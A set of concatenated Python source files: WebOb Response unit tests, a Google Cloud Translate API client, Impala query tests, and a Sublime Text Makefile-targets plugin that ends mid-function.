def test_body_get_is_unicode():
res = Response(app_iter=(['x'] * 51 + [u'x']))
assert_raises(TypeError, res.__getattribute__, 'body')
def test_body_set_not_unicode_or_str():
res = Response()
assert_raises(TypeError, res.__setattr__, 'body', object())
def test_body_set_unicode():
res = Response()
assert_raises(TypeError, res.__setattr__, 'body', u'abc')
def test_body_set_under_body_doesnt_exist():
res = Response('abc')
eq_(res.body, 'abc')
eq_(res.content_length, 3)
def test_body_del():
res = Response('123')
del res.body
eq_(res.body, '')
eq_(res.content_length, 0)
def test_text_get_no_charset():
res = Response(charset=None)
assert_raises(AttributeError, res.__getattribute__, 'text')
def test_unicode_body():
res = Response()
res.charset = 'utf-8'
bbody = 'La Pe\xc3\xb1a' # binary string
ubody = unicode(bbody, 'utf-8') # unicode string
res.body = bbody
eq_(res.unicode_body, ubody)
res.ubody = ubody
eq_(res.body, bbody)
del res.ubody
eq_(res.body, '')
def test_text_get_decode():
res = Response()
res.charset = 'utf-8'
res.body = 'La Pe\xc3\xb1a'
eq_(res.text, unicode('La Pe\xc3\xb1a', 'utf-8'))
def test_text_set_no_charset():
res = Response()
res.charset = None
assert_raises(AttributeError, res.__setattr__, 'text', 'abc')
def test_text_set_not_unicode():
res = Response()
res.charset = 'utf-8'
assert_raises(TypeError, res.__setattr__, 'text',
'La Pe\xc3\xb1a')
def test_text_del():
res = Response('123')
del res.text
eq_(res.body, '')
eq_(res.content_length, 0)
def test_body_file_del():
res = Response()
res.body = '123'
eq_(res.content_length, 3)
eq_(res.app_iter, ['123'])
del res.body_file
eq_(res.body, '')
eq_(res.content_length, 0)
def test_write_unicode():
res = Response()
res.text = unicode('La Pe\xc3\xb1a', 'utf-8')
res.write(u'a')
eq_(res.text, unicode('La Pe\xc3\xb1aa', 'utf-8'))
def test_write_unicode_no_charset():
res = Response(charset=None)
assert_raises(TypeError, res.write, u'a')
def test_write_text():
res = Response()
res.body = 'abc'
res.write(u'a')
eq_(res.text, 'abca')
def test_app_iter_del():
res = Response(
content_length=3,
app_iter=['123'],
)
del res.app_iter
eq_(res.body, '')
eq_(res.content_length, None)
def test_charset_set_no_content_type_header():
res = Response()
res.headers.pop('Content-Type', None)
assert_raises(AttributeError, res.__setattr__, 'charset', 'utf-8')
def test_charset_del_no_content_type_header():
res = Response()
res.headers.pop('Content-Type', None)
eq_(res._charset__del(), None)
def test_content_type_params_get_no_semicolon_in_content_type_header():
res = Response()
res.headers['Content-Type'] = 'foo'
eq_(res.content_type_params, {})
def test_content_type_params_get_semicolon_in_content_type_header():
res = Response()
res.headers['Content-Type'] = 'foo;encoding=utf-8'
eq_(res.content_type_params, {'encoding':'utf-8'})
def test_content_type_params_set_value_dict_empty():
res = Response()
res.headers['Content-Type'] = 'foo;bar'
res.content_type_params = None
eq_(res.headers['Content-Type'], 'foo')
def test_content_type_params_set_ok_param_quoting():
res = Response()
res.content_type_params = {'a':''}
eq_(res.headers['Content-Type'], 'text/html; a=""')
def test_set_cookie_overwrite():
res = Response()
res.set_cookie('a', '1')
res.set_cookie('a', '2', overwrite=True)
eq_(res.headerlist[-1], ('Set-Cookie', 'a=2; Path=/'))
def test_set_cookie_value_is_None():
res = Response()
res.set_cookie('a', None)
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=0')
eq_(val[1], 'Path=/')
eq_(val[2], 'a=')
assert val[3].startswith('expires')
def test_set_cookie_expires_is_None_and_max_age_is_int():
res = Response()
res.set_cookie('a', '1', max_age=100)
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=100')
eq_(val[1], 'Path=/')
eq_(val[2], 'a=1')
assert val[3].startswith('expires')
def test_set_cookie_expires_is_None_and_max_age_is_timedelta():
from datetime import timedelta
res = Response()
res.set_cookie('a', '1', max_age=timedelta(seconds=100))
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=100')
eq_(val[1], 'Path=/')
eq_(val[2], 'a=1')
assert val[3].startswith('expires')
def test_set_cookie_expires_is_not_None_and_max_age_is_None():
import datetime
res = Response()
then = datetime.datetime.utcnow() + datetime.timedelta(days=1)
res.set_cookie('a', '1', expires=then)
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
ok_(val[0] in ('Max-Age=86399', 'Max-Age=86400'))
eq_(val[1], 'Path=/')
eq_(val[2], 'a=1')
assert val[3].startswith('expires')
def test_set_cookie_value_is_unicode():
res = Response()
val = unicode('La Pe\xc3\xb1a', 'utf-8')
res.set_cookie('a', val)
eq_(res.headerlist[-1], (r'Set-Cookie', 'a="La Pe\\303\\261a"; Path=/'))
def test_delete_cookie():
res = Response()
res.headers['Set-Cookie'] = 'a=2; Path=/'
res.delete_cookie('a')
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=0')
eq_(val[1], 'Path=/')
eq_(val[2], 'a=')
assert val[3].startswith('expires')
def test_delete_cookie_with_path():
res = Response()
res.headers['Set-Cookie'] = 'a=2; Path=/'
res.delete_cookie('a', path='/abc')
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 4
val.sort()
eq_(val[0], 'Max-Age=0')
eq_(val[1], 'Path=/abc')
eq_(val[2], 'a=')
assert val[3].startswith('expires')
def test_delete_cookie_with_domain():
res = Response()
res.headers['Set-Cookie'] = 'a=2; Path=/'
res.delete_cookie('a', path='/abc', domain='example.com')
eq_(res.headerlist[-1][0], 'Set-Cookie')
val = [ x.strip() for x in res.headerlist[-1][1].split(';')]
assert len(val) == 5
val.sort()
eq_(val[0], 'Domain=example.com')
eq_(val[1], 'Max-Age=0')
eq_(val[2], 'Path=/abc')
eq_(val[3], 'a=')
assert val[4].startswith('expires')
def test_unset_cookie_not_existing_and_not_strict():
res = Response()
result = res.unset_cookie('a', strict=False)
assert result is None
def test_unset_cookie_not_existing_and_strict():
res = Response()
assert_raises(KeyError, res.unset_cookie, 'a')
def test_unset_cookie_key_in_cookies():
res = Response()
res.headers.add('Set-Cookie', 'a=2; Path=/')
res.headers.add('Set-Cookie', 'b=3; Path=/')
res.unset_cookie('a')
eq_(res.headers.getall('Set-Cookie'), ['b=3; Path=/'])
def test_merge_cookies_no_set_cookie():
res = Response()
result = res.merge_cookies('abc')
eq_(result, 'abc')
def test_merge_cookies_resp_is_Response():
inner_res = Response()
res = Response()
res.set_cookie('a', '1')
result = res.merge_cookies(inner_res)
eq_(result.headers.getall('Set-Cookie'), ['a=1; Path=/'])
def test_merge_cookies_resp_is_wsgi_callable():
L = []
def dummy_wsgi_callable(environ, start_response):
L.append((environ, start_response))
return 'abc'
res = Response()
res.set_cookie('a', '1')
wsgiapp = res.merge_cookies(dummy_wsgi_callable)
environ = {}
def dummy_start_response(status, headers, exc_info=None):
eq_(headers, [('Set-Cookie', 'a=1; Path=/')])
result = wsgiapp(environ, dummy_start_response)
assert result == 'abc'
assert len(L) == 1
L[0][1]('200 OK', []) # invoke dummy_start_response assertion
def test_body_get_body_is_None_len_app_iter_is_zero():
res = Response()
res._app_iter = StringIO()
res._body = None
result = res.body
eq_(result, '')
def test_cache_control_get():
res = Response()
eq_(repr(res.cache_control), "<CacheControl ''>")
eq_(res.cache_control.max_age, None)
def test_location():
# covers webob/response.py:934-938
res = Response()
res.location = '/test.html'
eq_(res.location, '/test.html')
req = Request.blank('/')
eq_(req.get_response(res).location, 'http://localhost/test.html')
res.location = '/test2.html'
eq_(req.get_response(res).location, 'http://localhost/test2.html')
def test_request_uri_http():
# covers webob/response.py:1152
from webob.response import _request_uri
environ = {
'wsgi.url_scheme': 'http',
'SERVER_NAME': 'test.com',
'SERVER_PORT': '80',
'SCRIPT_NAME': '/foobar',
}
eq_(_request_uri(environ), 'http://test.com/foobar')
def test_request_uri_no_script_name2():
# covers webob/response.py:1160
# There is a test_request_uri_no_script_name in test_response.py, but it
# sets SCRIPT_NAME.
from webob.response import _request_uri
environ = {
'wsgi.url_scheme': 'http',
'HTTP_HOST': 'test.com',
'PATH_INFO': '/foobar',
}
eq_(_request_uri(environ), 'http://test.com/foobar')
def test_cache_control_object_max_age_ten():
res = Response()
res.cache_control.max_age = 10
eq_(repr(res.cache_control), "<CacheControl 'max-age=10'>")
eq_(res.headers['cache-control'], 'max-age=10')
def test_cache_control_set_object_error():
res = Response()
assert_raises(AttributeError, setattr, res.cache_control, 'max_stale', 10)
def test_cache_expires_set():
res = Response()
res.cache_expires = True
eq_(repr(res.cache_control),
"<CacheControl 'max-age=0, must-revalidate, no-cache, no-store'>")
def test_status_int_set():
res = Response()
res.status_int = 400
eq_(res._status, '400 Bad Request')
def test_cache_control_set_dict():
res = Response()
res.cache_control = {'a':'b'}
eq_(repr(res.cache_control), "<CacheControl 'a=b'>")
def test_cache_control_set_None():
res = Response()
res.cache_control = None
eq_(repr(res.cache_control), "<CacheControl ''>")
def test_cache_control_set_unicode():
res = Response()
res.cache_control = u'abc'
eq_(repr(res.cache_control), "<CacheControl 'abc'>")
def test_cache_control_set_control_obj_is_not_None():
class DummyCacheControl(object):
def __init__(self):
self.header_value = 1
self.properties = {'bleh':1}
res = Response()
res._cache_control_obj = DummyCacheControl()
res.cache_control = {}
eq_(res.cache_control.properties, {})
def test_cache_control_del():
res = Response()
del res.cache_control
eq_(repr(res.cache_control), "<CacheControl ''>")
def test_body_file_get():
res = Response()
result = res.body_file
from webob.response import ResponseBodyFile
eq_(result.__class__, ResponseBodyFile)
def test_body_file_write_no_charset():
res = Response
assert_raises(TypeError, res.write, u'foo')
def test_body_file_write_unicode_encodes():
from webob.response import ResponseBodyFile
s = unicode('La Pe\xc3\xb1a', 'utf-8')
res = Response()
res.write(s)
eq_(res.app_iter, ['', 'La Pe\xc3\xb1a'])
def test_repr():
res = Response()
ok_(repr(res).endswith('200 OK>'))
def test_cache_expires_set_timedelta():
res = Response()
from datetime import timedelta
delta = timedelta(seconds=60)
res.cache_expires(seconds=delta)
eq_(res.cache_control.max_age, 60)
def test_cache_expires_set_int():
res = Response()
res.cache_expires(seconds=60)
eq_(res.cache_control.max_age, 60)
def test_cache_expires_set_None():
res = Response()
res.cache_expires(seconds=None, a=1)
eq_(res.cache_control.a, 1)
def test_cache_expires_set_zero():
res = Response()
res.cache_expires(seconds=0)
eq_(res.cache_control.no_store, True)
eq_(res.cache_control.no_cache, '*')
eq_(res.cache_control.must_revalidate, True)
eq_(res.cache_control.max_age, 0)
eq_(res.cache_control.post_check, 0)
def test_encode_content_unknown():
res = Response()
assert_raises(AssertionError, res.encode_content, 'badencoding')
def test_encode_content_identity():
res = Response()
result = res.encode_content('identity')
eq_(result, None)
def test_encode_content_gzip_already_gzipped():
res = Response()
res.content_encoding = 'gzip'
result = res.encode_content('gzip')
eq_(result, None)
def test_encode_content_gzip_notyet_gzipped():
res = Response()
res.app_iter = StringIO('foo')
result = res.encode_content('gzip')
eq_(result, None)
eq_(res.content_length, 23)
eq_(res.app_iter, ['\x1f\x8b\x08\x00\x00\x00\x00\x00\x02\xff', '',
'K\xcb\xcf\x07\x00', '!es\x8c\x03\x00\x00\x00'])
def test_encode_content_gzip_notyet_gzipped_lazy():
res = Response()
res.app_iter = StringIO('foo')
result = res.encode_content('gzip', lazy=True)
eq_(result, None)
eq_(res.content_length, None)
eq_(list(res.app_iter), ['\x1f\x8b\x08\x00\x00\x00\x00\x00\x02\xff', '',
'K\xcb\xcf\x07\x00', '!es\x8c\x03\x00\x00\x00'])
def test_decode_content_identity():
res = Response()
res.content_encoding = 'identity'
result = res.decode_content()
eq_(result, None)
def test_decode_content_weird():
res = Response()
res.content_encoding = 'weird'
assert_raises(ValueError, res.decode_content)
def test_decode_content_gzip():
from gzip import GzipFile
io = StringIO()
gzip_f = GzipFile(filename='', mode='w', fileobj=io)
gzip_f.write('abc')
gzip_f.close()
body = io.getvalue()
res = Response()
res.content_encoding = 'gzip'
res.body = body
res.decode_content()
eq_(res.body, 'abc')
def test__abs_headerlist_location_with_scheme():
res = Response()
res.content_encoding = 'gzip'
res.headerlist = [('Location', 'http:')]
result = res._abs_headerlist({})
eq_(result, [('Location', 'http:')])
def test_response_set_body_file():
for data in ['abc', 'abcdef'*1024]:
file = StringIO(data)
r = Response(body_file=file)
assert r.body == data
|
the-stack_106_23357 | # Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for interacting with the Google Cloud Translate API."""
import httplib2
import six
from gcloud._helpers import _to_bytes
from gcloud.translate.connection import Connection
ENGLISH_ISO_639 = 'en'
"""ISO 639-1 language code for English."""
class Client(object):
"""Client to bundle configuration needed for API requests.
:type api_key: str
:param api_key: The key used to send with requests as a query
parameter.
:type http: :class:`httplib2.Http` or class that defines ``request()``.
:param http: (Optional) HTTP object to make requests. If not
passed, an :class:`httplib.Http` object is created.
:type target_language: str
:param target_language: (Optional) The target language used for
translations and language names. (Defaults to
:data:`ENGLISH_ISO_639`.)
"""
def __init__(self, api_key, http=None, target_language=ENGLISH_ISO_639):
self.api_key = api_key
if http is None:
http = httplib2.Http()
self.connection = Connection(http=http)
self.target_language = target_language
def get_languages(self, target_language=None):
"""Get list of supported languages for translation.
Response
See: https://cloud.google.com/translate/v2/\
discovering-supported-languages-with-rest
:type target_language: str
:param target_language: (Optional) The language used to localize
returned language names. Defaults to the
target language on the current client.
:rtype: list
:returns: List of dictionaries. Each dictionary contains a supported
ISO 639-1 language code (using the dictionary key
``language``). If ``target_language`` is passed, each
dictionary will also contain the name of each supported
language (localized to the target language).
"""
query_params = {'key': self.api_key}
if target_language is None:
target_language = self.target_language
if target_language is not None:
query_params['target'] = target_language
response = self.connection.api_request(
method='GET', path='/languages', query_params=query_params)
return response.get('data', {}).get('languages', ())
def detect_language(self, values):
"""Detect the language of a string or list of strings.
See: https://cloud.google.com/translate/v2/\
detecting-language-with-rest
:type values: str or list
:param values: String or list of strings that will have
language detected.
:rtype: str or list
:returns: A list of dictionaries for each queried value. Each
dictionary typically contains three keys
* ``confidence``: The confidence in language detection, a
float between 0 and 1.
* ``input``: The corresponding input value.
* ``language``: The detected language (as an ISO 639-1
language code).
though the key ``confidence`` may not always be present.
If only a single value is passed, then only a single
dictionary will be returned.
:raises: :class:`ValueError <exceptions.ValueError>` if the number of
detections is not equal to the number of values.
:class:`ValueError <exceptions.ValueError>` if a value
produces a list of detections with 0 or multiple results
in it.
"""
single_value = False
if isinstance(values, six.string_types):
single_value = True
values = [values]
query_params = [('key', self.api_key)]
query_params.extend(('q', _to_bytes(value, 'utf-8'))
for value in values)
response = self.connection.api_request(
method='GET', path='/detect', query_params=query_params)
detections = response.get('data', {}).get('detections', ())
if len(values) != len(detections):
raise ValueError('Expected same number of values and detections',
values, detections)
for index, value in enumerate(values):
# Empirically, even clearly ambiguous text like "no" only returns
# a single detection, so we replace the list of detections with
# the single detection contained.
if len(detections[index]) == 1:
detections[index] = detections[index][0]
else:
message = ('Expected a single detection per value, API '
'returned %d') % (len(detections[index]),)
raise ValueError(message, value, detections[index])
detections[index]['input'] = value
# The ``isReliable`` field is deprecated.
detections[index].pop('isReliable', None)
if single_value:
return detections[0]
else:
return detections
def translate(self, values, target_language=None, format_=None,
source_language=None, customization_ids=()):
"""Translate a string or list of strings.
See: https://cloud.google.com/translate/v2/\
translating-text-with-rest
:type values: str or list
:param values: String or list of strings to translate.
:type target_language: str
:param target_language: The language to translate results into. This
is required by the API and defaults to
the target language of the current instance.
:type format_: str
:param format_: (Optional) One of ``text`` or ``html``, to specify
if the input text is plain text or HTML.
:type source_language: str
:param source_language: (Optional) The language of the text to
be translated.
:type customization_ids: str or list
:param customization_ids: (Optional) ID or list of customization IDs
for translation. Sets the ``cid`` parameter
in the query.
:rtype: str or list list
:returns: A list of dictionaries for each queried value. Each
dictionary typically contains three keys (though not
all will be present in all cases)
* ``detectedSourceLanguage``: The detected language (as an
ISO 639-1 language code) of the text.
* ``translatedText``: The translation of the text into the
target language.
* ``input``: The corresponding input value.
If only a single value is passed, then only a single
dictionary will be returned.
:raises: :class:`ValueError <exceptions.ValueError>` if the number of
values and translations differ.
"""
single_value = False
if isinstance(values, six.string_types):
single_value = True
values = [values]
if target_language is None:
target_language = self.target_language
if isinstance(customization_ids, six.string_types):
customization_ids = [customization_ids]
query_params = [('key', self.api_key), ('target', target_language)]
query_params.extend(('q', _to_bytes(value, 'utf-8'))
for value in values)
query_params.extend(('cid', cid) for cid in customization_ids)
if format_ is not None:
query_params.append(('format', format_))
if source_language is not None:
query_params.append(('source', source_language))
response = self.connection.api_request(
method='GET', path='', query_params=query_params)
translations = response.get('data', {}).get('translations', ())
if len(values) != len(translations):
raise ValueError('Expected iterations to have same length',
values, translations)
for value, translation in six.moves.zip(values, translations):
translation['input'] = value
if single_value:
return translations[0]
else:
return translations
|
the-stack_106_23361 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# General Impala query tests
import copy
import pytest
import re
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.test_dimensions import create_uncompressed_text_dimension
from tests.common.test_vector import ImpalaTestVector
class TestQueries(ImpalaTestSuite):
@classmethod
def add_test_dimensions(cls):
super(TestQueries, cls).add_test_dimensions()
if cls.exploration_strategy() == 'core':
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format == 'parquet')
# Manually adding a test dimension here to test the small query opt
# in exhaustive.
# TODO Cleanup required, allow adding values to dimensions without having to
# manually explode them
if cls.exploration_strategy() == 'exhaustive':
dim = cls.ImpalaTestMatrix.dimensions["exec_option"]
new_value = []
for v in dim:
new_value.append(ImpalaTestVector.Value(v.name, copy.copy(v.value)))
new_value[-1].value["exec_single_node_rows_threshold"] = 100
dim.extend(new_value)
cls.ImpalaTestMatrix.add_dimension(dim)
@classmethod
def get_workload(cls):
return 'functional-query'
def test_analytic_fns(self, vector):
# TODO: Enable some of these tests for Avro if possible
# Don't attempt to evaluate timestamp expressions with Avro tables which don't
# support a timestamp type
table_format = vector.get_value('table_format')
if table_format.file_format == 'avro':
pytest.xfail("%s doesn't support TIMESTAMP" % (table_format.file_format))
if table_format.file_format == 'hbase':
pytest.xfail("A lot of queries check for NULLs, which hbase does not recognize")
self.run_test_case('QueryTest/analytic-fns', vector)
def test_limit(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail("IMPALA-283 - select count(*) produces inconsistent results")
if vector.get_value('table_format').file_format == 'kudu':
pytest.xfail("Limit queries without order by clauses are non-deterministic")
self.run_test_case('QueryTest/limit', vector)
def test_top_n(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail(reason="IMPALA-283 - select count(*) produces inconsistent results")
# QueryTest/top-n is also run in test_sort with disable_outermost_topn = 1
self.run_test_case('QueryTest/top-n', vector)
def test_union(self, vector):
self.run_test_case('QueryTest/union', vector)
# IMPALA-3586: The passthrough and materialized children are interleaved. The batch
# size is small to test the transition between materialized and passthrough children.
query_string = ("select count(c) from ( "
"select bigint_col + 1 as c from functional.alltypes limit 15 "
"union all "
"select bigint_col as c from functional.alltypes limit 15 "
"union all "
"select bigint_col + 1 as c from functional.alltypes limit 15 "
"union all "
"(select bigint_col as c from functional.alltypes limit 15)) t")
vector.get_value('exec_option')['batch_size'] = 10
result = self.execute_query(query_string, vector.get_value('exec_option'))
assert result.data[0] == '60'
def test_sort(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail(reason="IMPALA-283 - select count(*) produces inconsistent results")
vector.get_value('exec_option')['disable_outermost_topn'] = 1
self.run_test_case('QueryTest/sort', vector)
# We can get the sort tests for free from the top-n file
self.run_test_case('QueryTest/top-n', vector)
def test_inline_view(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail("jointbl does not have columns with unique values, "
"hbase collapses them")
self.run_test_case('QueryTest/inline-view', vector)
def test_inline_view_limit(self, vector):
self.run_test_case('QueryTest/inline-view-limit', vector)
def test_subquery(self, vector):
self.run_test_case('QueryTest/subquery', vector)
def test_empty(self, vector):
self.run_test_case('QueryTest/empty', vector)
def test_views(self, vector):
if vector.get_value('table_format').file_format == "hbase":
pytest.xfail("TODO: Enable views tests for hbase")
self.run_test_case('QueryTest/views', vector)
def test_with_clause(self, vector):
if vector.get_value('table_format').file_format == "hbase":
pytest.xfail("TODO: Enable with clause tests for hbase")
self.run_test_case('QueryTest/with-clause', vector)
def test_misc(self, vector):
table_format = vector.get_value('table_format')
if table_format.file_format in ['hbase', 'rc', 'parquet', 'kudu']:
msg = ("Failing on rc/snap/block despite resolution of IMP-624,IMP-503. "
"Failing on kudu and parquet because tables do not exist")
pytest.xfail(msg)
self.run_test_case('QueryTest/misc', vector)
def test_null_data(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail("null data does not appear to work in hbase")
self.run_test_case('QueryTest/null_data', vector)
# Tests in this class are only run against text/none either because that's the only
# format that is supported, or the tests don't exercise the file format.
class TestQueriesTextTables(ImpalaTestSuite):
@classmethod
def add_test_dimensions(cls):
super(TestQueriesTextTables, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
@classmethod
def get_workload(cls):
return 'functional-query'
def test_overflow(self, vector):
self.run_test_case('QueryTest/overflow', vector)
def test_strict_mode(self, vector):
vector.get_value('exec_option')['strict_mode'] = 1
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/strict-mode', vector)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/strict-mode-abort', vector)
def test_data_source_tables(self, vector):
self.run_test_case('QueryTest/data-source-tables', vector)
def test_distinct_estimate(self, vector):
# These results will vary slightly depending on how the values get split up
# so only run with 1 node and on text.
vector.get_value('exec_option')['num_nodes'] = 1
self.run_test_case('QueryTest/distinct-estimate', vector)
def test_mixed_format(self, vector):
self.run_test_case('QueryTest/mixed-format', vector)
def test_values(self, vector):
self.run_test_case('QueryTest/values', vector)
# Tests in this class are only run against Parquet because the tests don't exercise the
# file format.
class TestQueriesParquetTables(ImpalaTestSuite):
@classmethod
def add_test_dimensions(cls):
super(TestQueriesParquetTables, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format == 'parquet')
@classmethod
def get_workload(cls):
return 'functional-query'
@pytest.mark.execute_serially
def test_very_large_strings(self, vector):
"""Regression test for IMPALA-1619. Doesn't need to be run on all file formats.
Executes serially to avoid large random spikes in mem usage."""
self.run_test_case('QueryTest/large_strings', vector)
def test_single_node_large_sorts(self, vector):
if self.exploration_strategy() != 'exhaustive':
pytest.skip("only run large sorts on exhaustive")
vector.get_value('exec_option')['disable_outermost_topn'] = 1
vector.get_value('exec_option')['num_nodes'] = 1
self.run_test_case('QueryTest/single-node-large-sorts', vector)
# Tests for queries in HDFS-specific tables, e.g. AllTypesAggMultiFilesNoPart.
# This is a subclass of TestQueries to get the extra test dimension for
# exec_single_node_rows_threshold in exhaustive.
class TestHdfsQueries(TestQueries):
@classmethod
def add_test_dimensions(cls):
super(TestHdfsQueries, cls).add_test_dimensions()
# Kudu doesn't support AllTypesAggMultiFilesNoPart (KUDU-1271, KUDU-1570).
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format != 'kudu')
def test_hdfs_scan_node(self, vector):
self.run_test_case('QueryTest/hdfs-scan-node', vector)
def test_file_partitions(self, vector):
self.run_test_case('QueryTest/hdfs-partitions', vector)
class TestTopNReclaimQuery(ImpalaTestSuite):
"""Test class to validate that TopN periodically reclaims tuple pool memory
and runs with a lower memory footprint."""
QUERY = "select * from tpch.lineitem order by l_orderkey desc limit 10;"
# Mem limit empirically selected so that the query fails if tuple pool reclamation
# is not implemented for TopN
MEM_LIMIT = "50m"
@classmethod
def get_workload(self):
return 'tpch'
@classmethod
def add_test_dimensions(cls):
super(TestTopNReclaimQuery, cls).add_test_dimensions()
# The tpch tests take a long time to execute so restrict the combinations they
# execute over.
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
def test_top_n_reclaim(self, vector):
exec_options = vector.get_value('exec_option')
exec_options['mem_limit'] = self.MEM_LIMIT
result = self.execute_query(self.QUERY, exec_options)
runtime_profile = str(result.runtime_profile)
num_of_times_tuple_pool_reclaimed = re.findall(
'TuplePoolReclamations: ([0-9]*)', runtime_profile)
# Confirm newly added counter is visible
assert len(num_of_times_tuple_pool_reclaimed) > 0
# Tuple pool is expected to be reclaimed for this query
for n in num_of_times_tuple_pool_reclaimed:
assert int(n) > 0
|
the-stack_106_23364 | import os, sublime, sublime_plugin, subprocess, json, re
FILE_REGEX = '^(..[^:\n]*):([0-9]+):?([0-9]+)?:? (.*)'
SYNTAX = 'Packages/Makefile/Make Output.sublime-syntax'
WORKING_DIR = '${folder:${project_path:${file_path}}}'
CANNED = {
'target': 'make_targets',
'file_regex': FILE_REGEX,
'working_dir': WORKING_DIR,
'selector': 'source.makefile',
'syntax': SYNTAX,
'keyfiles': ['Makefile', 'makefile'],
'cancel': {'kill': True},
'variants': [],
'makefile': None
}
TARGET_REGEX = '(.+)\s*:\s{1}'
def plugin_loaded():
build_file = 'MakeTargets.build-template'
dest_file = '{}/User/MakeTargets.sublime-build'.format(sublime.packages_path())
if not os.path.isfile(dest_file):
with open(dest_file, 'w') as f:
json.dump(CANNED, f, indent=2)
def plugin_unloaded():
settings = Settings()
settings.clear_on_change('show_last_cmd_status_bar')
settings.clear_on_change('ignored_target_prefixes')
settings.clear_on_change('target_regex')
settings.clear_on_change('regen_on_save')
settings.clear_on_change('hide_dup_targets')
settings.clear_on_change('phony_name')
settings.clear_on_change('sort_targets')
settings.clear_on_change('job_number')
def Window(window=None):
return window if window else sublime.active_window()
def Variables(window=None):
return Window(window).extract_variables()
def Expand(variable, window=None):
return sublime.expand_variables(variable, Variables(window))
def Settings(file='MakeTargets.sublime-settings'):
return sublime.load_settings(file)
def PanelArg(variant='', caption='MakeTargets'):
return dict(
args=dict(
build_system='Packages/User/MakeTargets.sublime-build',
choice_build_system=True,
choice_variant=True,
variant=variant
),
caption=caption,
command='build'
)
class MakeTargetsCommand(sublime_plugin.WindowCommand):
def __init__(self, edit):
sublime_plugin.WindowCommand.__init__(self, edit)
settings = Settings()
settings.add_on_change('show_last_cmd_status_bar', self.on_show_last_change)
settings.add_on_change('ignored_target_prefixes', self.on_ignore_prefixes_change)
settings.add_on_change('target_regex', self.on_target_regex_change)
settings.add_on_change('hide_dup_targets', self.on_hide_dup_targets_change)
settings.add_on_change('phony_name', self.on_phony_name_change)
settings.add_on_change('sort_targets', self.on_sort_targets_change)
settings.add_on_change('job_number', self.on_job_number_change)
self.build = Settings('MakeTargets.sublime-build')
self._targets = None
self.need_regen = True
self.target_regex = re.compile(settings.get('target_regex', TARGET_REGEX))
self.hide_dups = settings.get('hide_dup_targets', False)
self.phony = self.load_phony()
self.sort_targets = settings.get('sort_targets', False)
self.job_num = settings.get('job_number', None)
def load_phony(self):
phony = Settings().get('phony_name', None)
if phony and not phony.startswith('.'):
phony = '.' + phony
return phony
@property
def makefile(self):
return os.path.join(Expand('${project_path}', self.window), 'Makefile')
@property
def targets(self):
if not self._targets:
targets = []
if os.path.isfile(self.makefile):
with open(self.makefile, 'r') as f:
for line in f.readlines():
if self.phony:
if line.startswith(self.phony):
line = line.split(':', 1)[1].strip()
targets = line.split(' ')
break
elif self.target_regex.search(line):
line = line.strip()
if line and not any([line.startswith(ignore) for ignore in Settings().get('ignored_target_prefixes', [])]):
target = line.split(':')[0].strip()
if not (self.hide_dups and target in targets):
targets.append(target)
if self.sort_targets:
targets.sort()
self._targets = targets
return self._targets
def build_now(self, target, args={}):
self.window.run_command('exec', dict(
update_phantoms_only=True
))
cmd = 'make -j{} {}'.format(self.job_num if self.job_num else '', target).strip()
self.window.run_command('exec', dict(
cmd=cmd,
file_regex=args.get('file_regex', FILE_REGEX),
syntax=args.get('syntax', SYNTAX),
working_dir=args.get('working_dir', Expand(WORKING_DIR, self.window))
))
settings = Settings()
if settings.get('show_last_cmd_status_bar', False):
value = settings.get('status_bar_format', '{command}')
if '{command}' not in value:
value += '{command}'
self.window.active_view().set_status('mt_last_target', value.format(command=cmd))
def show_panel(self):
panel_args = {
'items': [
PanelArg(
variant=target.get('name', ''),
caption='MakeTargets - {}'.format(target.get('make_target', ''))
)
for target in self.build.get('variants')
]
}
panel_args['items'].insert(0, PanelArg())
